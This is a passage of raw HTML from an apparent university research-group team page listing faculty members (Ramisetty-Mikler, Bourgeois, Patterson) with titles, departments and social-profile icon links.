0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c445-outer\">\n <div data-colibri-id=\"182-c445\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c445 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c446\" class=\"d-block style-982 style-local-182-c446 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c446-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c446-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c447\" class=\"h-global-transition-all h-heading style-974 style-local-182-c447 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c447\">\n <!---->\n <!---->\n <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c448\" class=\"h-text h-text-component style-975 style-local-182-c448 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Research Associate Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c449\" class=\"h-text h-text-component style-976 style-local-182-c449 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Population Health Sciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c450\" class=\"style-983 style-local-182-c450 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c455-outer\">\n <div data-colibri-id=\"182-c455\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c455 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c456\" class=\"d-block style-973 style-local-182-c456 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c456-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c456-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c457\" class=\"h-global-transition-all h-heading style-974 style-local-182-c457 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c457\">\n <!---->\n <!---->\n <h4 class=\"\">Anu Bourgeois</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c458\" class=\"h-text h-text-component style-975 style-local-182-c458 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c459\" class=\"h-text h-text-component style-976 style-local-182-c459 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c460\" class=\"style-977 style-local-182-c460 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c461-outer\">\n <div data-colibri-id=\"182-c461\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c461 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c462\" class=\"d-block style-973 style-local-182-c462 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c462-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c462-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c463\" class=\"h-global-transition-all h-heading style-974 style-local-182-c463 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c463\">\n <!---->\n <!---->\n <h4 class=\"\">Murray Patterson</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c464\" class=\"h-text h-text-component style-975 style-local-182-c464 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Assistant Professor </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c465\" class=\"h-text h-text-component style-976 style-local-182-c465 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c466\" class=\"style-977 style-local-182-c466 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container 